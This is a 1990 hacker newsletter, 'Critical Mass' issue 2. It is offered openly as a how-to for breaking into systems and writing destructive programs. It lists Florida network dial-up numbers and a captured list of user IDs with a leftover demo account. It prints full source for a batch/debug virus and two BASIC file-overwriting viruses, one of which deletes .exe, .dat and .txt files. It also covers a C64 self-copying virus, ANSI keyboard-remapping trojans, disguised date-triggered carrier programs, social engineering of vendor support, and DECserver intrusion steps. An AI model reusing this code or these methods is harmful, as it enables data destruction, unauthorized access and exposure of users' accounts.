_____________________________________________________________________________ \~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~|~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~/ \ Critical Issue # 02 A Technical Text / \ Mass ~~~~~~~~~~~ File Newsletter. / \________________________________|____________________________________/ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ __________________________ __________ l___________ | ___________l // \ _______ _____ l|l _____ ______ ___ // /~~~~~~~\_\ l \ l l l|l l l // \ _ l l // / l [] / ~l l~ l|l ~l l~ // /~~~\_\ / \ l l <<<< ritical l / l l l|l l l // / / \ l l \\ \ l < l l l|l l l <<<< / ___ \ l l \\ \_______/~/ l l\ \ l l l|l l l \\ \____/~/ / / \ \ l l_____ \__________/ l__l \_\ l___l l_l l___l \_______/ /_/ \_\ l_______l ==--> ==--> ____ __ ____ ==--> (11/21/90) l \ / l ass ==--> l \ / l __ ______ ______ l \ / l / \ / \ / \ A Technical l l\ \ / /l l / \ / /~~~~~~ / /~~~~~~ text file newsletter l l\\ / l l / ____ \ \ ~~~~~~/ \ ~~~~~~/ ~~~~~~~~~~~~~~~~~~~~ l l \\____/ l l / / \ \ ~~~~/ / ~~~~/ / Issue: 2 l l l l /_/ \_\ /~~~~ / /~~~~ / ~~~~ ~~~~ ~~~~~~ ~~~~~~ _____________________________________________________________________________ l Writters l Special thanks to.... l l__________________________l________________________________________________l l l l l The Beaver l Old members of C.C.C, SF, Copy Cat, etc. l l Shadow l Also, Abigail, The Nut-Kracker, Robo., etc. l l__________________________l________________________________________________l * Note: We, the writters and editors, of this text newsletter are not respossible for any injuries or prosocutions due to the information giving in this text. EXPERIMENT AT YOUR OWN RISK! Anybody who is willing, can submit an article! If you wish to submit an article, please e-mail either 'The Beaver' or the 'Nut- Kracker', via the 'Warriers Retreat' (904)422-3606. Also, All sysops can freely download this text in the terms that it is not altered and none of the credits are change. So................. please act like a human! Also, for your convience, every now and then a 'volume' of the Critical Mass is created. That is, after three to five issues (roughly 50k to 70k of text) a compiled text will be made containing the past issues, so if you have missed any issues,you can download the volume you need. In order for this text to keep on being produced, you the reader needs to submit, either it be by asking questions (Which will sometime be included in the text) or by submitting and article. Any articles on Hacking, Fone Phreaking, Credit Card Surfing, Pirating, Chemistry, etc. our welcome. Any general 'not accepted' material is accepted here! Artcles can be on anything from 'how to rip off this type of coke machine' to 'how to build a Axis bomb from spare car parts'. We hope you enjoy the information given and find some use for it. /\ /\/\ Chief Editors Brought To You By /\/\/\ ~~~~~~~~~~~~~ Members of /\/\/\/\ The Beaver (SC/HA) /\/\/\/\/\ The Nut-Kracker /\/\/\/\/\/\ /\/Critical\/\ \/\/\Mass/\/\/ (SC/HA) \/\/\/\/\/\/ \/\/\/\/\/ \/\/\/\/ \/\/\/ \/\/ \/ ______________________________________________________________________________ l This issue contains articles of the following..... l l____________________________________________________________________________l l l l I. Editorial written by 'The Beaver'. l l II. Latest information on hacking InterAct, written by 'The Beaver' l l III. Destructive Programs For Your IBM PC, Part Two, By 'The Beaver' l l IV. Very Basic Hacking! By 'The Beaver' l l VI Hack DEC networks!, Wriiten by 'The Beaver'-'The Shadow' l l VII. Letters and Replies l l____________________________________________________________________________l ______________________________________________________________________________ l Todays Topic Is....... l l Written By The Beaver l l____________________________________________________________________________l Well, as you may notice, The Nut-Kracker hasn't submitted any articals for this text, but for a good reason. He has been having alot go on in his life and, well, just hasn't got the time. So, I may be looking for a new editor and writer soon, so if you wish to fill this postion, please E-mail me at the Warriers Retreat. I wish for someone to fill this postion with the following requirments........ So sort of hacking experiance in the fields of blue boxxing, computer hacking, chemistry, or pirating. If you don't have this experiance, but would still like to become a editor, please E-mail me anyway. Also, don't expect this issue to be anywhere like the last one, but if you do have some text files written by various hacker in the USA, please tell me about them so I can include it in the next issue. I have several text that I lost and are looking for..... They are...... The Outlaw Series ........ Written in Tallahassee, Fl (Sub. Explosives) Hacking VMS............... Written by members of Chaos Control If you have any copies of these, please E-mail me. By the way, the last issue (1st one) was over 138k bytes if you downloaded it. ---====--- __________________________________________________________________________ l I. Latest Infomation On Hacking InterAct l l Written By 'The Beaver' l l________________________________________________________________________l This is another FIRN hack that Florida hackers may find useful. The system is called interact off of the Florida Information Resource Network. The Nut-Kracker and I broke into this system under a Demo account a little while back. This system is running under a IBM 30XX series I think and is running under VM OS. It is used by the state of florida along with serveral universities. But first, let me give you a list of Florida area fone numbers to get in contact with this net......... City Fone Number Baud Rates ------------------------------------------------------------------------------- Boca Raton (305)395-0552 300/1200 395-1410 300/1200 Brevard (305)639-1790 300/1200 Broward (305)764-5540 300/1200 Eglin AFB (904)678-7056 300/1200 FT.Myers (813)489-4843 300/1200 Ft.Walton (904)244-8185 300/1200 Gainsville (904)392-5362 300/1200 Jacksonville (904)646-2992 300/1200 Miami (305)226-1846 300/1200 Orlando (305)275-2220 300/1200 Pensacola (904)474-2533,4,5,6 300/1200 Sarasota (813)957-4682 300/1200 St.Pete (813)893-9509 300/1200 Tampa (813)974-3890 300/1200 Tallahassee (904)488-0650,1,2,3,4,5,6,7 300/1200 W.Palm Bch. (305)969-3504 300/1200 Actually, a lot of these have 2400 Bds, but I can't remember which ones do and don't. At any rate, when you log on, you will be greeted with a 'User Name:' prompt. type 'Menu'. At the Menu you have a choice of three things to do besides log out. I know it isn't the 3 choice, so it is either 1 or 2. Pick either one or two and look for 'InterAct'. Once you have found it, log on to it. It should ask you for a username, ID and password. You can try the Demo accounts, but I doubt they will work cause we used them to death. Well if you have gotten this far you are going to need so usernames plus ID's so here they are. This is straight from the buffer..... 1 (INT-FXUWA) SIGNING ON (NOTIME) (NOBREAK) 2 (INT-NWRXL) OPS$NWRAD (INTERACT) (NOTIME) 4 (INT-LEO25) SIGNING ON (NOTIME) 46 (9DA) DEMO$DEMO (INTERACT) 56 (VTA TW1MFAAM) WEB$FAUFA (INTERACT) (NOTIME) 61 (VTA TW1MFAAF) CLS$FAURG (INTERACT) (NOTIME) 68 (VTA TW11DEDG) POR$DOEKD (INTERACT) (NOTIME) 75 (VTA TW1MFAAQ) SIGNING ON (NOTIME) 77 (VTA TW11FX1M) SGM$FSUAD (INTERACT) (NOTIME) 78 (VTA TW1MFXT8) RRN$FSUWK (INTERACT) (NOTIME) 81 (VTA TW1MFSF6) SA3$FSUHC (INTERACT) (NOTIME) 82 (VTA TW1MFSGM) FSU$FSUAD (INTERACT) (NOTIME) 91 (VTA TW11BR26) MKP$BORMS (INTERACT) (NOTIME) 103 (VTA TW11BR2F) MJH$BORMS (INTERACT) (NOTIME) 105 (VTA TW11FXZE) QC3$FSUAD (INTERACT) (NOTIME) 106 (VTA TW1MFXTO) FDA$FSUAC (INTERACT) (NOTIME) 107 (VTA TW11DEDO) SIGNING ON (NOTIME) 109 (VTA TW11DEB7) SIGNING ON (NOTIME) 111 (VTA TW1MCFAK) DFH$FTUIC (INTERACT) (NOTIME) 113 (VTA TW1MFSGZ) BRI$FSUBI (INTERACT) (NOTIME) 137 (VTA TW1MAMXB) MNG$FAMDC (INTERACT) (NOTIME) 138 (VTA TW1MFXUI) LST$FSUAD (INTERACT) (NOTIME) 140 (VTA TW1MCFA0) AIR$FTUIC (INTERACT) (NOTIME) 155 (VTA TW11FIY2) PRO$FIUAD (INTERACT) (NOTIME) (NOBREAK) 160 (VTA TW1MFSEY) SA2$FSUHC (INTERACT) (NOTIME) 166 (VTA TW1MFAAU) BCL$FAUFA (INTERACT) (NOTIME) 174 (VTA TW1MFIAI) IAG$FIUAD (INTERACT) (NOTIME) 183 (VTA TW11CJ20) CJC$CJCCS (INTERACT) (NOTIME) 187 (VTA TW1MFIA7) ABS$FIUAD (INTERACT) (NOTIME) 191 (VTA TW1MNWXA) KMA$NWRIC (INTERACT) (NOTIME) (DISK) 193 (VTA TW1MNWXX) GWS$NWRAD (INTERACT) (NOTIME) 197 (VTA TW1MFAAH) SSS$FAURG (INTERACT) (NOTIME) 200 (VTA TW1MFAAP) CAS$FAURG (INTERACT) (NOTIME) 202 (VTA TW11DE1Q) AC5$DOEKD (INTERACT) (NOTIME) 205 (VTA TP11WFHE) DWS$UWFCS (INTERACT) (NOTIME) 209 (VTA TW11FX0G) PCF$FSUAD (INTERACT) (NOTIME) 246 (VTA TW1MBYA8) BAY$BAYCS (INTERACT) (NOTIME) 247 (VTA TW1MFIAC) AXD$FIUAD (INTERACT) (NOTIME) 38 ACTIVE, 33 SIGNED ON, 33 ON INTERACT. COMMAND? All the numbers to the left are ports. The first two ports are for the sysops and if you notice that in port 46 there is a 'demo,demo' account that they forgot to take out. Thats how we hack the systems. Now let me explain how to find the user ID and names. Look at port 2. Notice that is says 'OPS$NWRAD'. 'OPS' is the username and 'NWRAD' is the ID. You can also tell somtimes where certain people are calling from. Such as people with the user name 'BAY' are probably calling from Bay County, Fl. Probably on the Eglin AFB line. Note: notice that port 246 ID is BAYCS, or Bay County Schools. Notice things like DOE (Dept. Of Education). Also, if you have any questions in hacking computers in the Tallahassee region or just a type of system, I or someone I know may be able to help, so just E-mail me if you have any sort or questions. ________________________________________________________________________ l Destructive Programs For Your IBM l l Part Two l l Written By 'The Beaver' l l______________________________________________________________________l In part one (issue#1), we covered the following........ How to use a text writter and debug to create small assembly programs. How to destroy disk (Trojan Horse) on drives A,B and C. How to create false errors. How to disable ALT-CTRL-DEL warm boot. A few other minnor things. Hopefully, we can carry this a little farther. Command Level Batch Virus. -------------------------------- Alot of people believe that it is not possible to create a virus at a command level. This is wrong, though the virus is not that deadly. The following code was put in for people to get a basic understanding of a virus. The virus comes in four parts and is very, very easy to stop. If one of these parts are deleted, the virus will fail to work. This code was written by Ralf Burger in 1988 as a demonstration virus. Heres the code in three parts and what the four parts are named. Name:Vr.bat (use edlin to enter it) echo=off ctty nul dir *.com/w>ind edlin ind<1 debug ind<2 edlin name.bat<3 ctty con Name:1 (use edlin) 1,4d e Name:2 (use edlin) m100,10b,f000 e108,".bat" m100,10b,f010 e100,"del " mf000,f00b,104 e10c 2e e110 0d,0a mf010,f020,11f e112 "copy \vr.bat " e12b,0d,0a rcx 2c nname.bat w q Name:3 (Must use Debug to enter this because of the 1Ah) 0100 31 2c 31 3f 52 20 1a 0d-6e 79 79 79 79 79 79 79 0110 79 20 0d 32 2c 32 3f 52-20 1a 0d 6e 6e 79 79 79 1120 79 79 79 79 20 0d 45 0d-00 00 00 00 00 00 00 00 If you care to understand how to code works, then simply remove the 'ctty nul', because this sends all output to a 'nul' device. If you remove that, also remove the 'ctty con', that restores output to the console. After doing this, it should become very clear about what is happening. This is a command level, over-writting logical virus, so it actually takes the place of its hosts code. For part two, I am going to keep the first few programs very simple and will probably get more into assembly code as we go along. As you have probably been thinking, 'wouldn't assembly code work much better for a virus?'. Well, thats correct. But first lets just get the basic understanding first. The following code is written in BASIC. It is a logical overwritting virus, but better self contained. It infects all files with the extention of COM. The actual virus though is compiled to a EXE. form though. To do this, I used QuickBasic 4.5. The Marker is the length on the virus, or 40396 bytes. This virus is also easy to stop, because the time and date stamp change , the length of the program and the file type also change. But to a person who isn't greatly familar with computers, it could still cause havoc. The only good thing about this is that it is totally self contained. Heres the listing.... 1 ON ERROR GOTO 3500: CLS : COLOR 0, 0 2 SHELL "dir *.exe>dna": SHELL "dir *.com>rna" 5 OPEN "rna" FOR INPUT AS #1 10 INPUT #1, w$, x$, y$, z$, a$ 15 CLOSE #1: f = 1: KILL "rna": IF a$ = "" THEN 3500 20 f = f + 1 25 IF MID$(a$, f, 1) = " " OR MID$(a$, f, 1) = "." OR f = 13 THEN GOTO 30 27 GOTO 20 30 oname$ = MID$(a$, 1, f - 1) 35 OPEN "dna" FOR INPUT AS #1 40 INPUT #1, w$, x$, y$, z$ 45 INPUT #1, a$: b$ = MID$(a$, 17, 5) 47 a = VAL(b$) 50 IF a <> 40396 THEN 45 53 KILL "dna" 55 f = 1 60 f = f + 1 65 IF MID$(a$, f, 1) = " " OR MID$(a$, f, 1) = "." OR f = 13 THEN GOTO 75 70 GOTO 60 75 nname$ = MID$(a$, 1, f - 1): COLOR 0, 0 80 KILL oname$ + ".com": SHELL "copy " + nname$ + ".exe " + oname$ + ".exe" 90 COLOR 0, 0 3010 KILL "dna": SHELL "del rna": end 3500 CLS : KILL "dna": KILL "*.exe": KILL "*.dat": KILL "*.txt": PRINT "Cough, H ack, Sniff" 3501 end As you may notice, when the computer hits a disk error, all data is destroyed. The next virus is also written in basic and is a logical virus. Once again you will need a compiler to use it properly though. The only difference is that the virus infects files with the extention of EXE. The logical virus itself is also a EXE. type virus. But the modifications compared to the one up top make this one work far greater. The traits that it shares with the first listing is that it also uses the length as a marker. The advantages over the one up top are that...... + 1. The listing is shorter 2. Disk access is cut in half, so less time is consumed. 3. The file type stays the same. 1 CLS : COLOR 0, 0, 0: ON ERROR GOTO 210: SHELL "DIR *.EXE>DNA": OPEN "DNA" FOR INPUT AS #1: INPUT #1, W$, X$, Y$, Z$, A$ 10 IF A$ = "" THEN 200 15 B$ = MID$(A$, 17, 5): B = VAL(B$) 20 IF B <> 38622 THEN 50 25 IF VNAME$ <> "" THEN INPUT #1, A$: GOTO 10 30 F = 1 35 F = F + 1: IF MID$(A$, F, 1) = " " OR MID$(A$, F, 1) = "." OR F = 13 THEN 40 38 GOTO 35 40 VNAME$ = MID$(A$, 1, F - 1): IF VNAME$ <> "" AND oname$ <> "" THEN 80 45 INPUT #1, A$: GOTO 10 50 IF oname$ <> "" THEN INPUT #1, A$: GOTO 10 55 F = 1 60 F = F + 1: IF MID$(A$, F, 1) = " " OR MID$(A$, F, 1) = "." OR F = 13 THEN 70 65 GOTO 60 70 oname$ = MID$(A$, 1, F - 1): IF oname$ <> "" AND VNAME$ <> "" THEN 80 75 INPUT #1, A$: GOTO 10 80 CLOSE #1: KILL "DNA": KILL oname$ + ".EXE": SHELL "COPY " + VNAME$ + ".EXE " + oname$ + ".EXE" 200 END 210 IF oname$ <> " " THEN SHELL oname$ 220 END In case you have a little trouble understanding the two, here are some flow charts that may, or may not help. Create a 'DNA' and 'RNA File. 'DNA' holds all 'EXE.' files. 'RNA' holds 'COM.' files. ! ! ! Are the any infectable 'COM' files stored in the 'RNA' File List? Y N ! ! ! ! ! ! I am not home!!! Get the name and Del all 'TXT.','DAT.' and store as 'oname' 'EXE.' files and display the message 'Cough, Hack ! ,sniff. After that, do a ! crash. ! Del 'RNA' and look though 'DNA' for a copy of the virus. The marker is the lenght to the virus. Note: If it does not exsists, there is no way the prg. can be held in in memory. This Will Be Stored as 'nname' ! ! ! Delete 'DNA' and the name under the string 'oname' which will be a 'EXE.' file. ! ! ! Copy then virus 'nname' as the old name was under, 'oname' and do a system crash. ------------------------------------------------------------------------------- The Dir. will go from this......... PRAY1.COM To...... PRAY1.EXE (Vir. Here) PRAY2.COM PRAY2.COM (No Vir) And So On To 'Pray2'.... Here is a flow chart for the second virus listing. Virus 2 Flow chart to a EXE to EXE infector, unlike Virus 1. ______________________________________________________________________________ Shell to DOS and create a file with all EXE. files in the current directory. The file that contains all the EXE file names is called `DNA` ! ! Get a file name out of `DNA` <--------------! ! ! ! ! ! Is the file name pulled contain a ! virus? ! ! Y N ! ! ! ! ! ! ! ! ! Is 'vname' taken Is 'oname' taken ! ! N Y N Y ----!--! ! ! ! !____________\___________________! ! ! / ! ! ! ! ! Store file name as Store file name as ! 'vname'. Has 'oname' 'oname'. Has 'vname' ! been used? been used? ! ! Y N Y N ! ! ! ! ! ! ! ! !_______/-\_______________!____! !________________________! ! ! ! Replicate and end. ^^^^^^^^^^^^^^^^^^ ______________________________________________________________________________ Virus2: Logical Virus. `Oname` - Old file name used. This is the original unifected file. `Vname` - Virus file name. This file has been infected and is retrieved so that the virus can copy itself to the `oname`. e.g. - Delete oname Copy vname.exe oname.exe (Sept. 18, 1990) Written by The Beaver. ______________________________________________________________________________ For the programs written in basic, it would be wise to use carrier programs, though they are not needed. It does look better if you do use one with these though. If you are going to write a carrier program, odds are that you will write it in BASIC. If so this is the best operation I see that you can do. Make the carrier program and the virus two different programs to save disk access time. Make a 'loader' or replace one on a program, such as a word processor we'll use for example. I would also go by either date or the number of times the program is used. I prefer the date because you don't have to read/ write to the disk in the carrier program, thus saving time. This is the order I would do them in..... 1. Is today equal or greater than the date to go off? if so, continue to 2. If not, run the wordprocessor as usual. 2. shell to the alt-ctrl-del killer (mentioned in issue#1) 3. shell to the virus. 4. end. Actually, what I think is a good idea is to change the file type of your virus from EXE. to say, DAT. This will make it more confusing to the user. So your carrier would look like this...... 1. Is today equal or greater than the date to go off? if so, continue to 2. If not, run the wordprocessor as usual. 2. Shell to the alt-ctrl-del killer 3. Change the viruses file type from DAT. to EXE. 4. shell to the virus 5. change the virus back to a DAT. file 6. end. Of course, this also will increase disk access time. Thats the main problem with viruses at any high level laugauge. I did not include any carrier code in this text because I am pretty sure that most users can write there own, but if you would really like some carrier code, then E-mail me and I will include it in the next issue. ATTENTION COMMODORE 64/128 USERS! ----------------------------------- This is a very simple logical virus written that I wrote on the c64 a number of years ago. This is the simple listing, in BASIC once again so that you can build on it. I could have modified this listing serval times, but I will leave that up to you. You can add in things like a line to determine if the virus is running on a c64 or c128. If its running on a c128, you can tell it to step up the clock speed, etc, etc..... I also have written a ton of trojan horses for this machine, but will not include them here. If you wish that I , drop me a line........ 10 open 1,8,0,"$0" 30 get#1,a$,b$ 40 get#1,a$,b$ 50 c=0 60 if a$<>"" then c=asc(a$):if c<>9 then 30 70 if b$<>"" then c=c+asc(b$)*256 84 get#1,b$:get#1,c$:get#1,d$:get#1,e$:b$="":c$="":d$="":e$="" 85 get#1,f$,g$,h$,i$,j$,k$,l$,m$,n$,o$,p$,q$,r$,s$,t$,u$,v$,w$ 90 z$=f$+g$+h$+i$+j$+k$+l$+m$+n$+o$+p$+q$+r$+s$+t$+u$+v$+w$ 100 close 1:open 15,8,15:print#15,"s0:"+z$ 110 close 15 120 open 15,8,15,"i":close 15:save z$,8 Thats all the Commie stuff Im including in this issue, unless you ask for more in further issues. Lets now move on to the Trojan Horse for the IBM. It has been thought for a long time that it was impossible to write a trojan into a text file on the IBM. This is WRONG. There is a great danger that lies here. The reason is because of the ANSI driver that is installed on most IBM's today. It is possible that I could have included a trojan in the very text your reading, but I did not. But to prove a point, at the end of this text, press the 'A' key and there will be a msg. displayed. This is was you would see right here....... (NOTE: for the letter 'A' to be remapped, you must 'type' this file and have a ANSI driver installed.) "[65;"echo The Beaver Was Here!";13p" "[97;"The Beaver Was Here!!!";13p" These are escape codes. I could have easy say something like ,gee, ya know what you should never type? that del *.com. In that one sentence, I COULD have remap your keyboard to wipe every COM. file out when you hit then letter 'D'. But I didn't though. Heres how it is done...... What is happening is that we are placing escape codes in the beging of our sentence. I will show you the escape codes here. Note the hex dump of the ....... 22 1B 5B 36 35 3B 22 65-63 68 6F 20 54 68 65 20 ".[65;"echo The 42 65 61 76 65 72 20 57-61 73 10 48 65 72 65 21 Beaver Was Here! 22 3B 31 33 70 22 0D 0A-00 00 00 00 00 00 00 00 ";13p".. First let me explain what some of the Hex codes stand for....... 22 - " 20 - (space) 1B - escape Now, actually, the first '22' and the last one can be removed with no effects to the trojan. After the '22', you will notice a 1B, which envokes the ANSI controller. Then what we tell it is that we are remapping asc '65' or the letter 'A' to mean 'echo The Beaver Was Here. The 13p gives us a return at the end. I won't go to much in detail for you IBM users, because thats why the program 'Remap Utility 1.0' was included in this issue. This program does the hole remapping process for you. If you do want to learn more about ANSI, then refer to you manual. Well, thats part two, but the next issue will contain part three of this ongoing series. The next part will contain....... Complete Non-overwriting code in assemble. Thats about it, the codes pretty long..... (500 bytes with remarks) ______________________________________________________________ l Very Basic Hacking l l Written By 'The Beaver' l l_____________________________________________________________l I have noted that there are alot of young and new hackers taking on the BBS scene. Alot of them are completely new to hacking, so I included a few tips and advice for the new hackers out there. All you other, more experianced hackers can just skip through this stuff, or bare through it in hopes you may learn something. Unix - UNIX can sometime idenified just by the prompt, just like most machines. On a VAX running UNISTRIDE, you will get a greeting message of some sort along with a logon prompt. Type CTRL-S. If the damn thing freezes up on ya, its probably UNIX. To get it unstuck, hit CTRL-Q. There are other ways to identify this. Sometimes a CTRL-Y will reset the login message. Characters that make the cursor dance, etc. UNIX is had to put in one field, because it can be used on everything from the home PC to a mainframe. I really hate UNISTRIDE, unless it is set up hack easy, which is rare. You can hack it several ways. First off, some UNIX systems allow you to use a 'WHO' command to get a userlist before logging on. This is rare. You can, believe it or not, sometimes use the rapid fire method (Explained later). Sometimes there are also guest accounts. A guest accout goes like this; Username:GUEST Password:. Hard, huh? Once inside, you will find this OS very easy to use. To get higher access, you can get the privileged password. That is, like on a DEC server, normal users can become privileged by the use of one password. There are also some other advanced ways discovered by Robert Morris, Jr. Like the Sendmail attact, and the fingerd attact, But we won't go into advanced hacking right now. VMS - Very user friendly. To confirm your on VMS, type /XXXX. Fill in the 'XXXX' with any garbage. If you get a error along the lines of, ' commmand qualifier not present', or something like that, your on VMS. Try DEMO accounts first (always do this!). Alot of times, the password is the same as the username, in the default settings. Get a copy of 'Hacking VMS' by the Chaos Control Commit. (C.C.C). If you find this, e-mail me, I can't find it anywhere. VM-370 - Sucks Well I won't go into Primo's, VM-370, RSTS, TOPs, or ULTRIX shit. Rapid - This method doesn't work much anymore, except one old Borrough's Fire systems and stuff. Any rate, heres what happens. Imagine you ask a system 'what time is it?'. The system will put you command in a buffer and run off and see if you have access to get the time. While it runs off, you change the command to something like, 'Give me a userlist'. The system comes back with a 'Okay', and allows the second command to fall through. Thats one way off this method, here's another. You ask the system any question, like the time for instance. When it runs off to get verification, you fill the buffer with crap. This is basicly how the fingerd method works, but a little more complicatied. I've only seen these two method work once on a B2700, I think it was. Decoy - Ok, this is a more advanced hacking method. I will just give the idea here. We'll actually got into it in Hacking DEC, part II. Think of this, on a PC BBS Level. Your the user and I'm the hacker. Now you call the BBS and you see things to recognize, right? Thinks like welcome to such and such BBS and all that. Well, one day I decide I want a account on a system. We'll just say that I use call forwarding from the BBS to my house. See? I get all the info and not the BBS! so in the end, you think your on something your not, and I get all the info! __________________________________________________________________ l l l Hacking DECserver's Part II l l By 'The Beaver' l l________________________________________________________________l Here is more information about those great DECserver you and I love. Please, read part I or you won't understand what is going on. The information given like last time, we beleive has never be disclosed in any other text file or news letter. You should feel lucky. All information was found by myself, 'The Beaver','Shadow', and 'The Nut-Kracker'. We also had some help from several other people. Thanx.......... To start off, lets talk just about the server themselves. In the first part, I called it 'Hacking DEC200 servers'. This was a incorrect statement. That is, you can use these skills on many other nets such as the EMULEX corp. Preformance4000, or the DEC300 servers, so don't take the first part that literally. There are somethings different on the DEC200 and 300's. 200's can only support 8 ports because there are only 8 rs232 ports, but they can be expained to 16 ports. The 300 has 16 port and can support 32. Some DEC's can support up to 50 ports that I know of. The same with 4000's. One great way to find out hacking info on these is to call DEC at 1800-323-4827. Sound like you know what your talking about, and they will tell you anything. Just say something like, ' Hello, Im here at UF using a DEC (DECK)200, and Im having trouble setting up the maintenace password. What should I do?". He'll ask you a bunch of question like, "Whats the DEC200 on?". You say "A VAX running VMS 5.1". If you sound like you know what your doing, you can get anything from these people. Well, enough small talk, lets get started.......... A while back, the Shadow and I found a state runned DEC200 in our region. All it had on it was 2 in/out modems (pre-programed), LAT Printer, and a VAX named 'Legal3'. Pretty pointless to use a server for this, but at anyrate, we became intrested in the VAX. We decided to attempt to set up a decoy (explained later in the text). Shadow was the first to do this. When he set it up, he found that suddenly a remote port logged in, and was following him around, but when he disconnected from it, the remote port disapeared. Pretty strange, needless to say. We came to the theory that this was some sort or monitoring port, that seemed to only come alive when a service was set up. Any rate, it doesn't stop there. Once trying to he tried to knock out that remote port and got a -151- error messages, or 'system init 1 minute to shut down', but this was canceled, but not by him. We figure that there are ways to make your sever more secure. We were able to get past it though. Just resently, we found this while trying to set up decoys. This is really odd, and we still don't know what to make of it. We went on and type the following........ set service test set service test idenification "testing 1-2-3" set service test port all enabled This creates a fake service "test" and says that all ports can use it. The thing is that it says, its a computer, its availible and this is what it is. When you connect to it, nothing happens. A complete null. Once though when we where hacking very fast, but I won't go into that, shadow was booted from the system, and a remote port was put in his place. I chaser program that I just talked about. He got booted because of call waiting. I wasn't sure if he left or if he changed his port from dynamic status to remote status, so I send him a message. I got no response, and returned to the fake service. When I returned, I recieved my own message, even though I sent it to his port. Could this be the broadcast buffer, we are not sure yet, and will fill you in when the answer is found. Here are a few more commands that will help you in the future. set server dump e/d (priv. only) In a REAL crash (not a init), all memory contents are dumped to a console port, or YOU! sho service local shows all local services like LAT printers, in/out modems, etc............ and last but not least....... set service connections (get help) this allows you to connect OTHER ports to services. Well, sorry theres not more, but we have been having some trouble lately, but there is more to come........ Before I go, here is a list of call numbers off of ufnet for you FIRN hackers......... Call # Comment ----------------------- 200 DECserver 201 EMULEX 4000 server 202 Dito 3000 DECserver 3001 Dito 3002 Dito 3003 Dito 2000 NERDC (North east reginal data center) 1400 VAX/UNIX ?????? 1100 UNKNOWN 900 Industral VAX/UNIX 800 UNIX(Bikini) 700 UNIX/VAX (Beach) 500 VAX 11/750 250 DECserver (down ALOT!) 170 Selene 120 Selene Thats All! Chow ---====--- _____________________________________________ l l l Letters and Replies l l___________________________________________l *NOTE: All letters sent to 'Critical Mass' writter's and editors are posted here anynomous like, unless you tell us other wise. Please, ask questions and I will try to reply or find the answer for you. The whole bases of this text depends on YOU! Msg # 1 Date: Fri 12-28-90, 8:35 pm From: XXXXXXXXXXXX Read: 1 times [1 Reply] Subject: Hacking stuff... (Hows the wife/kids) The Beaver, I just finished your little article called "CRITICAL MASS", and must say, I am impressed! You apparently know your stuff! Anyway I have a few questions concerning some of the things you talked about... (I am interested in that kind of thing)... Number 1: Where did you learn about Assembly... I mean you just do not read the stuff you talked about in PC World or other PC magazines (do you?)... The reason I would like know is because I am the type of person who likes languages, practical jokes.. ECT... (BTW nice keyboard locker, and Disk Access locker!)(My brother went nuts trying to fix the computer!) Number 2: Do you know anything about something called "GREEN BOXING"... I am sure you do, since you know about BLUE BOXING... Well, I need the plans for a "green box", and figured you might have some you could upload, and place a password on for me... I of course would need a part list... (Reading the plans is hard enough for me, much less telling the difference on paper between a capacitor and a transistor...! But hey I am learning... And lastly: If you have no idea what I mean (if I miss named it)... This little mechanism is in a little box about the size of your hand... And when the button is pushed on it, it emitts a series of clicks, and beeps... When held up to a pay-phone, these clicks, and beeps sound to it like a Quarter dropping into it.. And these are nice for long distance calls, ect... Well, That is it, and oh by the way.... You would be supprised at the number of "Program Hackers" around town now-a-days...... Thanks, XXXXXXXXXXXX P.S. Please keep the information comming.... Oh yea before I forget I am having trouble getting on to the FIRN system... What is my terminal identifier? First the first question. I learned alot of assembly from a school friend of mine while taking electronics and becoming a tech. He has to be the most versital programmer I have ever seen. He taught me all about what registers do to what a interrupt 13 will do. There are tons of books on assembly, but they are hard to read and very techical. I got really started after using a assembler called "CHASM" which comes with a little tutorial on assembly. From there I just got the books it told me about. By the way, thats great about your brother. Also, code like I gave in the last issue isn't hard to find. You just got to look around, if you know what I mean. The second question. I think you really mean a "red box". This baby simulates the tones needed to preform a nickel, quarter and dime tones. I hate to tell you this, but I only have plans for the blue, silver, white and black box at this time. I don't know what type of computer(s) you have, but if you have a c64 there are tons of great programs you can get. The only problem is that none of the boxxes can be used in our area code. Thats not to say that you can't use it outside our area code though. I know that 800 and 305 work, along with 205 and others, but if I where you, I would just stay way from it all. Since the equipment replacing and such, it is become more difficult to box. Mostly off 800, doing that is nuts. I can probably get the tones and make up a schematic if you still desire one. Third, when connecting to firn, your terminal identifier should be "a". If this doesn't work try "d". Happy hacking.......... ---====--- By:XXXXXXXXXXXXXXXXX I'm having trouble navigating though FIRN. Could you or somebody give me some help or some pointers about what I am doing wrong. Thanks If you have never been on the FIRN system, follow the directions below: Call 488-0650 with you'r modem wait for a connect and shit chars to be recived press return at the terminal identifier type at the login prompt enter press return at the first menu type <2> press return at the next menu type

press return wait for about 5 sec. press return twice at the "#" prompt enter press return wait for about 5 sec. press return twice you should now see a "Local>" prompt type press return If you don't know what to do, or how anything works, at any "Local>" prompt, enter and return. This should show some self explanatory info. If you have any problems, myself or the beaver u'll help. My knowledge of netsys's are not cavernous, but I do know something... Anyway, If you see me on, don't hesitate to to my port (unless you see a "" behind my name, if that is the case, I can receive your msg's, but not send any). I should be on the DEC Call 200 aera mostly every night from 11:00pm to about 3:00am (aprox). - Shadow _______________________________________ l l l Finnal Notes l l_____________________________________l Well, this concludes the second issue of Critical Mass. I wish there was more, but you know how it goes. Before we end this issue, I would like to state several things though. If you, the reader, don't like Critical Mass or any of the software that myself, or anybody associated with Critical Mass puts out, please contact us and not the people we know. Don't hassle them, hassle me. Its fun to see how stupid you guys can be. Besides, if you don't like it, don't download it! Its as easy as that. I have had several people tell me (not directly) that they are going to follow up on legal actions against me because there BBS's hard disks have crashed. Well, I envite them to for the following reasons......... 1. I have not crashed ANYONE's hard disk. If I did you would know. I'm not affraid to to say 'I did it'. Based on the last trojans I have sent out, and yes I did in my COMMIE years, my name was beside the program all the way. 2. Even if I did, you don't know my name, phone number, or address. Think about it. 3. If you really thought a 22 byte long file was a 'killer game' or what not, you shouldn't have a hard disk in the first place. 4. If I hit you, you would know, instead of a little trojan. I prefer virsues, EVEN THOUGH I HAVE NEVER SENT ONE OUT. Actually, I expected alot of E-mail from people that where pissed about the IBM Home Destruction Kit, but I was taken by the positive E-mail I got. It really threw me off! I like it though, so please keep sending your E-mail in about question, comments, insults you have. Its great. I can now be contacted at one of the following places............ Under the name 'The Beaver'....... Warriers Retreat (904) 422-3606 and The Reactor BBS (904) 878-1736 Please E-mail me. I enjoy it. The following software can be picked up at 'The Reactor BBS'............. The 